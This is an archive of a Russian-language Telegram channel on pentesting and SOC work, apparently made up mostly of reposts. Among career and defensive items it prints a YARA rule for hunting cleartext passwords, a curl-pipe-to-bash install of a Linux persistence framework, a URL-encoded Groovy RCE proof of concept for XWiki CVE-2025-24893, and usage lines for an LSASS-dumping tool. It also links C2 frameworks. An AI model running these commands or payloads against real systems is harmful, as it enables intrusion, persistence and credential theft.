en
Feedback
Fsecurity | HH

Fsecurity | HH

Open in Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Show more
2 066
Subscribers
-224 hours
-97 days
+330 days
Posts Archive
Одна из самых популярных точек входа в мир кибербезопасности через инженера SOC L1. Более того, эта позиция дает достаточно очевидный и прозрачный рост в сторону L2 и L3. Единственный нюанс – многие до сих пор думают, что SOC, это что-то про мониторинг инцидентов, хотя это далеко не так. Я тут наткнулся на годный файлик, в котором подробно и лаконично расписана вся подноготная SOC – начиная с его структуры, заканчивая описанием каждой роли внутри него. Более того, там даже есть заметки на тему того, чего не хватает ребятам с L1 для того, чтобы перейти на L2 и так далее. В общем, делюсь. Кажется, такие вещи нужно знать всем безопасникам. #SOC #BaseSecurity 🧠 Твой Пакет Знаний | 🛍 Другие каналы

Repost from s0ld13r ch.
S0LD13R - Offensive YARA 😄 🚨 Caution: Use for educational purposes only, author is not responsible for your actions 🚨 В кл
S0LD13R - Offensive YARA 😄 🚨 Caution: Use for educational purposes only, author is not responsible for your actions 🚨 В классическом представлении YARA — это инструмент для поиска вредоносных файлов и индикаторов компрометации (IoC). Но в реальности YARA может стать отличным помощником на этапах пентеста и Red Team операций 🕺 T1552.001 Unsecured Credentials: Credentials In Files - техника применяемая для поиска паролей и ключей для получения доступов в различные системы. Пентестер проникает на хост и ищет креды для повышения привилегий или бокового перемещения. Данный этап можно автоматизировать при помощи Yara сигнатур, осуществляя поиск по файлам в директориях и строкам в них 🥂 PoC:
rule ClearTextPasswords_Search_Extended
{
    strings:
        $password1 = "password"
        $password2 = "pwd"
        $password3 = "пароль"
        $password4 = "Password"
        $password6 = "Пароль"

    condition:
        any of them and (filesize < 5MB)
}
Command line 👩‍💻
.\yara64.exe .\rule.yar C:\
Детект 🛡 Регулярный мониторинг на стороне EDR, так как поведение может быть аномальным для хоста и легко обнаруживается. Применять строго в целях тестирования и с разрешения собственника системы @s0ld13r_ch

Repost from Pentest HaT
🛡️ PANIX - Persistence Against *NIX v2.1.0 Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, п
🛡️ PANIX - Persistence Against *NIX v2.1.0 Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, предназначенный для пентестеров, инженеров по обнаружению, CTF энтузиастов и других. Уделено особое внимание функциональности, что делает его важным инструментом для понимания и реализации широкого спектра методов закрепления. Запуск:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash
😹 Home #soft #shell #linux #pentest ✈️ Pentest HaT

🔗Ссылка: https://opennet.ru/62836/

Repost from AP Security
#soc Windows Eventlog ID's В данном репозитории собрана полезная информация для аналитиков безопасности в разрезе безопасности корпоративных доменов.

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from #memekatz
Когда уложил прод пэйлоадом из ChatGPT

Специальный фреймворк для потрошения браузеров. Типа "C2" со своим сервером, а агент устанавливается как расширение для браузера. Blog: https://medium.com/@darkrain2009/redext-browser-extension-based-command-control-framework-1eec1402f146 Soft: https://github.com/Darkrain2009/RedExt Возможностей там много, от просмотра данных, до скриншотов и захвата ввода) #c2 #pentest #redteam #creds

Repost from SecuriXy.kz
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893 PoC: /xwiki/bin/ge
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893 PoC:
<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
https://github.com/advisories/GHSA-rr6p-3pfg-562j

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from s0ld13r ch.
XiebroC2 - open-source аналог CobaltStrike из Китая 😏 XiebroC2 позиционируется как многофункциональный C2-фреймворк с телегр
XiebroC2 - open-source аналог CobaltStrike из Китая 😏 XiebroC2 позиционируется как многофункциональный C2-фреймворк с телеграм-нотификациями и поддержкой скриптов на Lua. Аналог Cobalt Strike, но с открытым кодом и фишками под RedTeam задачи ⌨️ Фичи 👈 1️⃣Кроссплатформеннный имплант на Golang под популярные семейства ОС 2️⃣Управление через client: файлы, процессы, сетевой трафик, инъекции, скриншоты, reverse shell/reverse proxy 3️⃣Возможность автоматически уведомлять о новых сессиях в Telegram Помимо 3 основных фич есть возможность писать собственные плагины, для расширения функциональности и многое другое 🚬 Едиственный минус который я для себя заметил, это то что клиент и сервер только под Windows, можно конечно обернуть под Wine но это уже будет совсем другая история 😔 🔗 Repo: https://github.com/INotGreen/XiebroC2.git 🔗 Plugins: https://github.com/INotGreen/Xiebro-Plugins 🔗 Demo: https://www.youtube.com/watch?v=iZpltGdu4Y4 @s0ld13r_ch

Repost from Pentest HaT
💻 ShadowDumper v2.0 Мощный инструмент, который позволяет сделать дамп памяти LSASS. Использует различные продвинутые техники
💻 ShadowDumper v2.0 Мощный инструмент, который позволяет сделать дамп памяти LSASS. Использует различные продвинутые техники, позволяя получить доступ к конфиденциальным данным.
.\ShadowDumper.exe 1
To dump lsass memory using unhooking technique to inject modified mimikatz binary [Token Elevation, SAM Dumping, Vault Credentials, Lsass Hashes Dumping].

.\ShadowDumper.exe 2
To dump lsass memory using unhooking technique to inject binary using direct syscalls with MDWD.

.\ShadowDumper.exe 3
To dump lsass memory using simple MiniDumpWriteDump API.

.\ShadowDumper.exe 4
To dump lsass memory using MINIDUMP_CALLBACK_INFORMATION callbacks and encrypt the dumps before writing on disk as per your choice.

.\ShadowDumper.exe 5
To dump lsass memory using process forking technique and encrypt the dumps before writing on disk as per your choice.

.\ShadowDumper.exe 6
To dump lsass memory using direct syscalls with MiniDumpWriteDump.

.\ShadowDumper.exe 7
To dump lsass memory using direct syscalls (native dump with needed streams for parsing offline).
  
.\ShadowDumper.exe 8
To decrypt the dump file before offline parsing with tools like (mimikatz or pypykatz).
Сборку осуществлять в 💻 Visual Studio 2019 (v142) или новее, также в релизах есть собранный бинарник 😹 Home 😹 Releases #redteam #soft #pentest #shadowdumper #lsass ✈️ Pentest HaT

Repost from AP Security
#pentest PoC CVE-2025-1094 В СУБД PostgreSQL обнаружена уязвимость внедрения SQL-кода, связанная с некорректной обработкой интерактивным инструментом PostgreSQL psql определенных недопустимых байтовых последовательностей в символах UTF-8. Затронуты все версии PostgreSQL до 17.3, 16.7, 15.11, 14.16 и 13.19. Познакомиться с эксплойтом можно по следующей ссылке.